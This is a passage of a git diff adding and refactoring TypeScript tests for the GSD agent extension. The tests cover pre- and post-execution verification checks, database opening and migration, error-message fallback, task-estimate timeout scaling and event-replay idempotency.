+  for (const file of REAL_GSD_FILES) {
+    const fullPath = join(GSD_SRC_DIR, file);
+    if (!existsSync(fullPath)) {
+      throw new Error(`Test fixture file does not exist: ${fullPath}`);
+    }
+  }
+}
+
+// ─── Integration Tests ───────────────────────────────────────────────────────
+
+describe("Enhanced Verification Integration Tests", () => {
+  // Verify fixtures before running tests
+  test("test fixture files exist", () => {
+    verifyTestFixturesExist();
+  });
+
+  describe("Pre-Execution Checks on Real GSD Code", () => {
+    test("runs pre-execution checks on realistic tasks referencing real files", async () => {
+      // Simulate tasks that reference real GSD source files
+      const tasks: TaskRow[] = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          title: "Add validation to gsd-db",
+          description: `
+## Steps
+1. Update src/resources/extensions/gsd/gsd-db.ts to add validation
+2. Read from src/resources/extensions/gsd/types.ts for type definitions
+3. Update src/resources/extensions/gsd/errors.ts with new error types
+4. Run tests to verify changes
+          `.trim(),
+          files: REAL_GSD_FILES.slice(0, 4).map((f) => join(GSD_SRC_DIR, f)),
+          inputs: [
+            join(GSD_SRC_DIR, "types.ts"),
+            join(GSD_SRC_DIR, "errors.ts"),
+          ],
+          expected_output: [
+            join(GSD_SRC_DIR, "gsd-db.ts"),
+          ],
+        }),
+      ];
+
+      const start = performance.now();
+      const result = await runPreExecutionChecks(tasks, GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // R012: No blocking failures (false positives) on production code
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Expected zero blocking failures, got: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Overall status should not be fail
+      assert.notEqual(result.status, "fail", "Pre-execution checks should not fail on real GSD code");
+
+      // R013: Speed target met
+      assert.ok(
+        duration < PRE_EXECUTION_TIMEOUT_MS,
+        `Pre-execution checks took ${duration.toFixed(0)}ms, expected <${PRE_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("handles task with code block references to real packages", async () => {
+      // Task description with realistic code blocks using actual Node.js built-ins
+      const tasks: TaskRow[] = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          title: "Implement file watcher",
+          description: `
+## Implementation
+
+\`\`\`typescript
+import { readFileSync, writeFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { existsSync } from "node:fs";
+
+// Use existing GSD types
+import type { TaskRow } from "./gsd-db.ts";
+\`\`\`
+
+Update the file watcher to use these imports.
+          `.trim(),
+          files: [join(GSD_SRC_DIR, "auto-verification.ts")],
+        }),
+      ];
+
+      const start = performance.now();
+      const result = await runPreExecutionChecks(tasks, GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Speed target met
+      assert.ok(
+        duration < PRE_EXECUTION_TIMEOUT_MS,
+        `Pre-execution checks took ${duration.toFixed(0)}ms, expected <${PRE_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("handles multi-task sequence with file dependencies", async () => {
+      // Simulate a realistic task sequence where T02 depends on T01's output
+      const tasks: TaskRow[] = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          title: "Create types file",
+          status: "complete",
+          expected_output: [join(GSD_SRC_DIR, "types.ts")],
+        }),
+        createTask({
+          id: "T02",
+          sequence: 1,
+          title: "Use types in implementation",
+          description: `
+Read the types from src/resources/extensions/gsd/types.ts and use them.
+          `.trim(),
+          inputs: [join(GSD_SRC_DIR, "types.ts")],
+          files: [join(GSD_SRC_DIR, "gsd-db.ts")],
+        }),
+      ];
+
+      const start = performance.now();
+      const result = await runPreExecutionChecks(tasks, GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Speed target met
+      assert.ok(
+        duration < PRE_EXECUTION_TIMEOUT_MS,
+        `Pre-execution checks took ${duration.toFixed(0)}ms, expected <${PRE_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+  });
+
+  describe("Post-Execution Checks on Real GSD Code", () => {
+    test("runs post-execution checks on real GSD source files", () => {
+      // Simulate a completed task that modified real files
+      const completedTask = createTask({
+        id: "T01",
+        title: "Update gsd-db validation",
+        status: "complete",
+        key_files: [
+          join(GSD_SRC_DIR, "gsd-db.ts"),
+          join(GSD_SRC_DIR, "types.ts"),
+        ],
+      });
+
+      const start = performance.now();
+      const result = runPostExecutionChecks(completedTask, [], GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // R012: No blocking failures (false positives) on production code
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Expected zero blocking failures, got: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Overall status should not be fail
+      assert.notEqual(result.status, "fail", "Post-execution checks should not fail on real GSD code");
+
+      // R013: Speed target met
+      assert.ok(
+        duration < POST_EXECUTION_TIMEOUT_MS,
+        `Post-execution checks took ${duration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("analyzes imports in real TypeScript files", () => {
+      // Use auto-verification.ts which imports from multiple other GSD files
+      const completedTask = createTask({
+        id: "T02",
+        title: "Verify auto-verification imports",
+        status: "complete",
+        key_files: [join(GSD_SRC_DIR, "auto-verification.ts")],
+      });
+
+      const start = performance.now();
+      const result = runPostExecutionChecks(completedTask, [], GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Speed target met
+      assert.ok(
+        duration < POST_EXECUTION_TIMEOUT_MS,
+        `Post-execution checks took ${duration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("handles multi-file task with cross-file dependencies", () => {
+      // Task that touched multiple related files
+      const completedTask = createTask({
+        id: "T03",
+        title: "Refactor state management",
+        status: "complete",
+        key_files: [
+          join(GSD_SRC_DIR, "state.ts"),
+          join(GSD_SRC_DIR, "gsd-db.ts"),
+          join(GSD_SRC_DIR, "cache.ts"),
+        ],
+      });
+
+      const start = performance.now();
+      const result = runPostExecutionChecks(completedTask, [], GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Speed target met
+      assert.ok(
+        duration < POST_EXECUTION_TIMEOUT_MS,
+        `Post-execution checks took ${duration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("handles task sequence with signature analysis", () => {
+      // Simulate checking for signature consistency across tasks
+      const priorTasks: TaskRow[] = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          title: "Define TaskRow interface",
+          status: "complete",
+          key_files: [join(GSD_SRC_DIR, "gsd-db.ts")],
+        }),
+      ];
+
+      const completedTask = createTask({
+        id: "T02",
+        sequence: 1,
+        title: "Use TaskRow in state module",
+        status: "complete",
+        key_files: [join(GSD_SRC_DIR, "state.ts")],
+      });
+
+      const start = performance.now();
+      const result = runPostExecutionChecks(completedTask, priorTasks, GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Speed target met
+      assert.ok(
+        duration < POST_EXECUTION_TIMEOUT_MS,
+        `Post-execution checks took ${duration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+  });
+
+  describe("Combined Pre and Post Execution Flow", () => {
+    test("full verification flow on realistic task lifecycle", async () => {
+      // Simulate a complete task lifecycle
+      const tasks: TaskRow[] = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          title: "Implement enhanced verification",
+          status: "pending",
+          description: `
+## Steps
+1. Update pre-execution-checks.ts with new validation
+2. Update post-execution-checks.ts with signature analysis
+3. Add integration tests
+
+\`\`\`typescript
+import { runPreExecutionChecks } from "./pre-execution-checks.ts";
+import { runPostExecutionChecks } from "./post-execution-checks.ts";
+\`\`\`
+          `.trim(),
+          files: [
+            join(GSD_SRC_DIR, "pre-execution-checks.ts"),
+            join(GSD_SRC_DIR, "post-execution-checks.ts"),
+          ],
+          inputs: [
+            join(GSD_SRC_DIR, "types.ts"),
+            join(GSD_SRC_DIR, "gsd-db.ts"),
+          ],
+          expected_output: [
+            join(GSD_SRC_DIR, "tests/enhanced-verification-integration.test.ts"),
+          ],
+        }),
+      ];
+
+      // Run pre-execution checks
+      const preStart = performance.now();
+      const preResult = await runPreExecutionChecks(tasks, GSD_SRC_DIR);
+      const preDuration = performance.now() - preStart;
+
+      // Verify pre-execution results
+      const preBlockingFailures = preResult.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        preBlockingFailures.length,
+        0,
+        `Pre-execution had blocking failures: ${JSON.stringify(preBlockingFailures, null, 2)}`
+      );
+      assert.ok(
+        preDuration < PRE_EXECUTION_TIMEOUT_MS,
+        `Pre-execution took ${preDuration.toFixed(0)}ms, expected <${PRE_EXECUTION_TIMEOUT_MS}ms`
+      );
+
+      // Task after execution (simulated completion)
+      const completedTask = createTask({
+        ...tasks[0],
+        status: "complete",
+        key_files: tasks[0].files,
+      });
+
+      // Run post-execution checks
+      const postStart = performance.now();
+      const postResult = runPostExecutionChecks(completedTask, [], GSD_SRC_DIR);
+      const postDuration = performance.now() - postStart;
+
+      // Verify post-execution results
+      const postBlockingFailures = postResult.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        postBlockingFailures.length,
+        0,
+        `Post-execution had blocking failures: ${JSON.stringify(postBlockingFailures, null, 2)}`
+      );
+      assert.ok(
+        postDuration < POST_EXECUTION_TIMEOUT_MS,
+        `Post-execution took ${postDuration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS}ms`
+      );
+    });
+
+    test("handles large number of files without timeout", () => {
+      // Use all available GSD source files to stress test
+      const allGsdFiles = REAL_GSD_FILES.map((f) => join(GSD_SRC_DIR, f));
+
+      const task = createTask({
+        id: "T01",
+        title: "Large refactor touching many files",
+        status: "complete",
+        key_files: allGsdFiles,
+        files: allGsdFiles,
+      });
+
+      const start = performance.now();
+      const result = runPostExecutionChecks(task, [], GSD_SRC_DIR);
+      const duration = performance.now() - start;
+
+      // No blocking failures
+      const blockingFailures = result.checks.filter((c) => !c.passed && c.blocking);
+      assert.equal(
+        blockingFailures.length,
+        0,
+        `Unexpected blocking failures: ${JSON.stringify(blockingFailures, null, 2)}`
+      );
+
+      // Should still be fast even with many files
+      // Allow slightly more time for multi-file analysis but still within target
+      assert.ok(
+        duration < POST_EXECUTION_TIMEOUT_MS * 2, // Allow 2x for stress test
+        `Multi-file post-execution took ${duration.toFixed(0)}ms, expected <${POST_EXECUTION_TIMEOUT_MS * 2}ms`
+      );
+    });
+  });
+
+  describe("Warning Quality", () => {
+    test("warnings on real code are actionable, not spurious", () => {
+      // Run checks on well-formed production code
+      const task = createTask({
+        id: "T01",
+        title: "Review code quality",
+        status: "complete",
+        key_files: [
+          join(GSD_SRC_DIR, "pre-execution-checks.ts"),
+          join(GSD_SRC_DIR, "post-execution-checks.ts"),
+        ],
+      });
+
+      const result = runPostExecutionChecks(task, [], GSD_SRC_DIR);
+
+      // Extract warnings (either non-passed non-blocking, or passed with warning messages)
+      const warnings = result.checks.filter(
+        (c) => (!c.passed && !c.blocking) || (c.passed && c.message?.startsWith("Warning:"))
+      );
+
+      // Warnings are acceptable but should be few on well-maintained code
+      // If we get many warnings, it suggests the checks are too aggressive
+      assert.ok(
+        warnings.length <= 10,
+        `Too many warnings (${warnings.length}) suggests overly aggressive checks: ${JSON.stringify(warnings, null, 2)}`
+      );
+
+      // Each warning should have a clear message
+      for (const warning of warnings) {
+        assert.ok(warning.category, "Warning missing category");
+        assert.ok(warning.message, "Warning missing message");
+        assert.ok(
+          warning.message.length > 10,
+          `Warning message too short to be actionable: "${warning.message}"`
+        );
+      }
+    });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/ensure-db-open.test.ts b/src/resources/extensions/gsd/tests/ensure-db-open.test.ts
index 48c5703d5..d68438cf4 100644
--- a/src/resources/extensions/gsd/tests/ensure-db-open.test.ts
+++ b/src/resources/extensions/gsd/tests/ensure-db-open.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 // ensureDbOpen — Tests that the lazy DB opener creates + migrates the database
 // when .gsd/ exists with Markdown content but no gsd.db file.
 //
@@ -5,14 +7,11 @@
 // "GSD database is not available" because ensureDbOpen only opened
 // existing DB files but never created them.
 
-import { createTestContext } from './test-helpers.ts';
 import * as path from 'node:path';
 import * as os from 'node:os';
 import * as fs from 'node:fs';
 import { closeDatabase, isDbAvailable, getDecisionById } from '../gsd-db.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
-
 function makeTmpDir(): string {
   const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-ensure-db-'));
   return dir;
@@ -28,141 +27,138 @@ function cleanupDir(dir: string): void {
 // ensureDbOpen creates DB + migrates when .gsd/ has Markdown
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n── ensureDbOpen: creates DB from Markdown ──');
+describe('ensure-db-open', () => {
+  test('ensureDbOpen: creates DB from Markdown', async () => {
+    const tmpDir = makeTmpDir();
+    const gsdDir = path.join(tmpDir, '.gsd');
+    fs.mkdirSync(gsdDir, { recursive: true });
 
-{
-  const tmpDir = makeTmpDir();
-  const gsdDir = path.join(tmpDir, '.gsd');
-  fs.mkdirSync(gsdDir, { recursive: true });
+    // Write a minimal DECISIONS.md so migration has content
+    const decisionsContent = `# Decisions
 
-  // Write a minimal DECISIONS.md so migration has content
-  const decisionsContent = `# Decisions
+  | # | When | Scope | Decision | Choice | Rationale | Revisable |
+  |---|------|-------|----------|--------|-----------|-----------|
+  | D001 | M001 | architecture | Use SQLite | SQLite | Sync API | Yes |
+  `;
+    fs.writeFileSync(path.join(gsdDir, 'DECISIONS.md'), decisionsContent);
 
-| # | When | Scope | Decision | Choice | Rationale | Revisable |
-|---|------|-------|----------|--------|-----------|-----------|
-| D001 | M001 | architecture | Use SQLite | SQLite | Sync API | Yes |
-`;
-  fs.writeFileSync(path.join(gsdDir, 'DECISIONS.md'), decisionsContent);
+    // Verify no DB file exists yet
+    const dbPath = path.join(gsdDir, 'gsd.db');
+    assert.ok(!fs.existsSync(dbPath), 'DB file should not exist before ensureDbOpen');
 
-  // Verify no DB file exists yet
-  const dbPath = path.join(gsdDir, 'gsd.db');
-  assertTrue(!fs.existsSync(dbPath), 'DB file should not exist before ensureDbOpen');
+    // Close any previously open DB
+    try { closeDatabase(); } catch { /* ok */ }
 
-  // Close any previously open DB
-  try { closeDatabase(); } catch { /* ok */ }
+    // Override process.cwd to point at tmpDir for ensureDbOpen
+    const origCwd = process.cwd;
+    process.cwd = () => tmpDir;
 
-  // Override process.cwd to point at tmpDir for ensureDbOpen
-  const origCwd = process.cwd;
-  process.cwd = () => tmpDir;
+    try {
+      // Dynamic import to get the freshest version
+      const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
 
-  try {
-    // Dynamic import to get the freshest version
-    const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
+      const result = await ensureDbOpen();
 
-    const result = await ensureDbOpen();
+      assert.ok(result === true, 'ensureDbOpen should return true when .gsd/ has Markdown');
+      assert.ok(fs.existsSync(dbPath), 'DB file should be created after ensureDbOpen');
+      assert.ok(isDbAvailable(), 'DB should be available after ensureDbOpen');
 
-    assertTrue(result === true, 'ensureDbOpen should return true when .gsd/ has Markdown');
-    assertTrue(fs.existsSync(dbPath), 'DB file should be created after ensureDbOpen');
-    assertTrue(isDbAvailable(), 'DB should be available after ensureDbOpen');
-
-    // Verify that Markdown migration actually ran
-    const decision = getDecisionById('D001');
-    assertTrue(decision !== null, 'D001 should be migrated from DECISIONS.md');
-    if (decision) {
-      assertEq(decision.scope, 'architecture', 'Migrated decision scope should match');
-      assertEq(decision.choice, 'SQLite', 'Migrated decision choice should match');
+      // Verify that Markdown migration actually ran
+      const decision = getDecisionById('D001');
+      assert.ok(decision !== null, 'D001 should be migrated from DECISIONS.md');
+      if (decision) {
+        assert.deepStrictEqual(decision.scope, 'architecture', 'Migrated decision scope should match');
+        assert.deepStrictEqual(decision.choice, 'SQLite', 'Migrated decision choice should match');
+      }
+    } finally {
+      process.cwd = origCwd;
+      closeDatabase();
+      cleanupDir(tmpDir);
     }
-  } finally {
-    process.cwd = origCwd;
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // ensureDbOpen returns false when no .gsd/ exists
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('ensureDbOpen: no .gsd/ returns false', async () => {
+    const tmpDir = makeTmpDir();
+    // No .gsd/ directory at all
+
+    try { closeDatabase(); } catch { /* ok */ }
+    const origCwd = process.cwd;
+    process.cwd = () => tmpDir;
+
+    try {
+      const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
+      const result = await ensureDbOpen();
+      assert.ok(result === false, 'ensureDbOpen should return false when no .gsd/ exists');
+      assert.ok(!isDbAvailable(), 'DB should not be available');
+    } finally {
+      process.cwd = origCwd;
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // ensureDbOpen opens existing DB without re-migration
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('ensureDbOpen: opens existing DB', async () => {
+    const tmpDir = makeTmpDir();
+    const gsdDir = path.join(tmpDir, '.gsd');
+    fs.mkdirSync(gsdDir, { recursive: true });
+
+    // Create a DB file first
+    const dbPath = path.join(gsdDir, 'gsd.db');
+    const { openDatabase } = await import('../gsd-db.ts');
+    openDatabase(dbPath);
     closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
 
-// ═══════════════════════════════════════════════════════════════════════════
-// ensureDbOpen returns false when no .gsd/ exists
-// ═══════════════════════════════════════════════════════════════════════════
+    assert.ok(fs.existsSync(dbPath), 'DB file should exist from manual create');
 
-console.log('\n── ensureDbOpen: no .gsd/ returns false ──');
+    const origCwd = process.cwd;
+    process.cwd = () => tmpDir;
 
-{
-  const tmpDir = makeTmpDir();
-  // No .gsd/ directory at all
+    try {
+      const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
+      const result = await ensureDbOpen();
+      assert.ok(result === true, 'ensureDbOpen should open existing DB');
+      assert.ok(isDbAvailable(), 'DB should be available');
+    } finally {
+      process.cwd = origCwd;
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
 
-  try { closeDatabase(); } catch { /* ok */ }
-  const origCwd = process.cwd;
-  process.cwd = () => tmpDir;
+  // ═══════════════════════════════════════════════════════════════════════════
+  // ensureDbOpen returns false for empty .gsd/ (no Markdown, no DB)
+  // ═══════════════════════════════════════════════════════════════════════════
 
-  try {
-    const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
-    const result = await ensureDbOpen();
-    assertTrue(result === false, 'ensureDbOpen should return false when no .gsd/ exists');
-    assertTrue(!isDbAvailable(), 'DB should not be available');
-  } finally {
-    process.cwd = origCwd;
-    cleanupDir(tmpDir);
-  }
-}
+  test('ensureDbOpen: empty .gsd/ creates empty DB (#2510)', async () => {
+    const tmpDir = makeTmpDir();
+    const gsdDir = path.join(tmpDir, '.gsd');
+    fs.mkdirSync(gsdDir, { recursive: true });
+    // .gsd/ exists but no DECISIONS.md, REQUIREMENTS.md, or milestones/
 
-// ═══════════════════════════════════════════════════════════════════════════
-// ensureDbOpen opens existing DB without re-migration
-// ═══════════════════════════════════════════════════════════════════════════
+    try { closeDatabase(); } catch { /* ok */ }
+    const origCwd = process.cwd;
+    process.cwd = () => tmpDir;
 
-console.log('\n── ensureDbOpen: opens existing DB ──');
+    try {
+      const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
+      const result = await ensureDbOpen();
+      assert.ok(result === true, 'ensureDbOpen should create empty DB for fresh .gsd/');
+      assert.ok(fs.existsSync(path.join(gsdDir, 'gsd.db')), 'DB file should be created');
+      assert.ok(isDbAvailable(), 'DB should be available');
+    } finally {
+      process.cwd = origCwd;
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
 
-{
-  const tmpDir = makeTmpDir();
-  const gsdDir = path.join(tmpDir, '.gsd');
-  fs.mkdirSync(gsdDir, { recursive: true });
+  // ═══════════════════════════════════════════════════════════════════════════
 
-  // Create a DB file first
-  const dbPath = path.join(gsdDir, 'gsd.db');
-  const { openDatabase } = await import('../gsd-db.ts');
-  openDatabase(dbPath);
-  closeDatabase();
-
-  assertTrue(fs.existsSync(dbPath), 'DB file should exist from manual create');
-
-  const origCwd = process.cwd;
-  process.cwd = () => tmpDir;
-
-  try {
-    const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
-    const result = await ensureDbOpen();
-    assertTrue(result === true, 'ensureDbOpen should open existing DB');
-    assertTrue(isDbAvailable(), 'DB should be available');
-  } finally {
-    process.cwd = origCwd;
-    closeDatabase();
-    cleanupDir(tmpDir);
-  }
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// ensureDbOpen returns false for empty .gsd/ (no Markdown, no DB)
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── ensureDbOpen: empty .gsd/ returns false ──');
-
-{
-  const tmpDir = makeTmpDir();
-  fs.mkdirSync(path.join(tmpDir, '.gsd'), { recursive: true });
-  // .gsd/ exists but no DECISIONS.md, REQUIREMENTS.md, or milestones/
-
-  try { closeDatabase(); } catch { /* ok */ }
-  const origCwd = process.cwd;
-  process.cwd = () => tmpDir;
-
-  try {
-    const { ensureDbOpen } = await import('../bootstrap/dynamic-tools.ts');
-    const result = await ensureDbOpen();
-    assertTrue(result === false, 'ensureDbOpen should return false for empty .gsd/');
-  } finally {
-    process.cwd = origCwd;
-    cleanupDir(tmpDir);
-  }
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/error-success-mask.test.ts b/src/resources/extensions/gsd/tests/error-success-mask.test.ts
new file mode 100644
index 000000000..d6dd9719a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/error-success-mask.test.ts
@@ -0,0 +1,37 @@
+/**
+ * error-success-mask.test.ts — #3664
+ *
+ * Verify that the agent-end-recovery error handler detects when errorMessage
+ * is uninformative (e.g. "success", "ok", "unknown") and falls back to
+ * extracting the real error from the assistant message text content.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const sourceFile = join(__dirname, "..", "bootstrap", "agent-end-recovery.ts");
+
+describe("error-success mask detection (#3664)", () => {
+  const source = readFileSync(sourceFile, "utf-8");
+
+  test("detects useless errorMessage values with regex", () => {
+    assert.match(source, /success\|ok\|true\|error\|unknown/i);
+  });
+
+  test("extracts display message from content text block", () => {
+    assert.match(source, /textBlock/);
+    assert.match(source, /\.text\.slice\(0,\s*300\)/);
+  });
+
+  test("classifies using rawErrorMsg, not displayMsg", () => {
+    assert.match(source, /classifyError\(rawErrorMsg/);
+  });
+
+  test("references issue #3588 in comments", () => {
+    assert.match(source, /#3588/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/est-annotation-timeout.test.ts b/src/resources/extensions/gsd/tests/est-annotation-timeout.test.ts
new file mode 100644
index 000000000..973243cc6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/est-annotation-timeout.test.ts
@@ -0,0 +1,120 @@
+/**
+ * est-annotation-timeout.test.ts — Regression tests for #2243.
+ *
+ * Tasks with `est: 30m` or `est: 2h` annotations should get extended
+ * supervision timeouts. The parseEstimateMinutes helper should parse
+ * estimate strings, and startUnitSupervision should use them.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const timersSrcPath = join(import.meta.dirname, "..", "auto-timers.ts");
+const timersSrc = readFileSync(timersSrcPath, "utf-8");
+
+// ─── Source analysis: parseEstimateMinutes exists and is exported ────────────
+
+test("#2243: auto-timers.ts should export parseEstimateMinutes", () => {
+  assert.ok(
+    timersSrc.includes("export function parseEstimateMinutes"),
+    "parseEstimateMinutes should be exported from auto-timers.ts",
+  );
+});
+
+// ─── Inline unit test of parseEstimateMinutes logic ─────────────────────────
+// Since importing the module pulls in heavy deps, test the parsing logic inline.
+
+function parseEstimateMinutes(estimate: string): number | null {
+  if (!estimate || typeof estimate !== "string") return null;
+  const trimmed = estimate.trim();
+  if (!trimmed) return null;
+
+  let totalMinutes = 0;
+  let matched = false;
+
+  const hoursMatch = trimmed.match(/(\d+)\s*h/i);
+  if (hoursMatch) {
+    totalMinutes += Number(hoursMatch[1]) * 60;
+    matched = true;
+  }
+
+  const minutesMatch = trimmed.match(/(\d+)\s*m/i);
+  if (minutesMatch) {
+    totalMinutes += Number(minutesMatch[1]);
+    matched = true;
+  }
+
+  return matched ? totalMinutes : null;
+}
+
+test("#2243: parseEstimateMinutes parses '30m' correctly", () => {
+  assert.equal(parseEstimateMinutes("30m"), 30);
+});
+
+test("#2243: parseEstimateMinutes parses '2h' correctly", () => {
+  assert.equal(parseEstimateMinutes("2h"), 120);
+});
+
+test("#2243: parseEstimateMinutes parses '1h30m' correctly", () => {
+  assert.equal(parseEstimateMinutes("1h30m"), 90);
+});
+
+test("#2243: parseEstimateMinutes parses '15m' correctly", () => {
+  assert.equal(parseEstimateMinutes("15m"), 15);
+});
+
+test("#2243: parseEstimateMinutes returns null for empty string", () => {
+  assert.equal(parseEstimateMinutes(""), null);
+});
+
+test("#2243: parseEstimateMinutes returns null for invalid string", () => {
+  assert.equal(parseEstimateMinutes("not a time"), null);
+});
+
+// ─── Source analysis: startUnitSupervision uses task estimates ───────────────
+
+test("#2243: startUnitSupervision should reference task estimates for timeout scaling", () => {
+  const usesEstimate =
+    timersSrc.includes("parseEstimateMinutes") &&
+    timersSrc.includes("estimateMinutes") &&
+    timersSrc.includes("taskEstimate");
+
+  assert.ok(
+    usesEstimate,
+    "startUnitSupervision should use task estimate annotations for timeout scaling",
+  );
+});
+
+test("#2243: SupervisionContext should accept an optional taskEstimate field", () => {
+  const ctxIdx = timersSrc.indexOf("SupervisionContext");
+  assert.ok(ctxIdx !== -1, "SupervisionContext interface exists");
+
+  const ctxEnd = timersSrc.indexOf("}", ctxIdx);
+  const ctxBlock = timersSrc.slice(ctxIdx, ctxEnd);
+
+  assert.ok(
+    ctxBlock.includes("taskEstimate"),
+    "SupervisionContext should include a taskEstimate field",
+  );
+});
+
+test("#2243: timeouts should be scaled by estimate (timeoutScale in source)", () => {
+  assert.ok(
+    timersSrc.includes("timeoutScale"),
+    "auto-timers.ts should use a timeoutScale factor derived from est: annotations",
+  );
+});
+
+test("#2243: idle timeout should NOT be scaled (idle is idle regardless of estimate)", () => {
+  // Find the idleTimeoutMs line
+  const idleIdx = timersSrc.indexOf("const idleTimeoutMs");
+  assert.ok(idleIdx !== -1, "idleTimeoutMs variable exists");
+  
+  const idleLine = timersSrc.slice(idleIdx, timersSrc.indexOf("\n", idleIdx));
+  assert.ok(
+    !idleLine.includes("timeoutScale"),
+    "idleTimeoutMs should NOT be scaled — idle is idle",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/event-replay-idempotency.test.ts b/src/resources/extensions/gsd/tests/event-replay-idempotency.test.ts
new file mode 100644
index 000000000..b2dacb555
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/event-replay-idempotency.test.ts
@@ -0,0 +1,140 @@
+// GSD State Machine Regression Tests — Event Replay & Reconciliation (#3161)
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  updateTaskStatus,
+  insertVerificationEvidence,
+  upsertDecision,
+} from "../gsd-db.ts";
+import { extractEntityKey } from "../workflow-reconcile.ts";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────────
+
+const MID = "M001";
+const SID = "S01";
+const TID = "T01";
+const TS = new Date().toISOString();
+
+function setupDb(): void {
+  openDatabase(":memory:");
+  insertMilestone({ id: MID, title: "Test Milestone" });
+  insertSlice({ id: SID, milestoneId: MID, title: "Test Slice" });
+  insertTask({ id: TID, sliceId: SID, milestoneId: MID, title: "Test Task" });
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────────
+
+describe("event-replay-idempotency", () => {
+  beforeEach(() => {
+    setupDb();
+  });
+
+  afterEach(() => {
+    closeDatabase();
+  });
+
+  test("updateTaskStatus is idempotent for complete_task replay", () => {
+    // Simulates replaying a complete_task event twice (e.g. crash recovery)
+    updateTaskStatus(MID, SID, TID, "done", TS);
+    updateTaskStatus(MID, SID, TID, "done", TS);
+
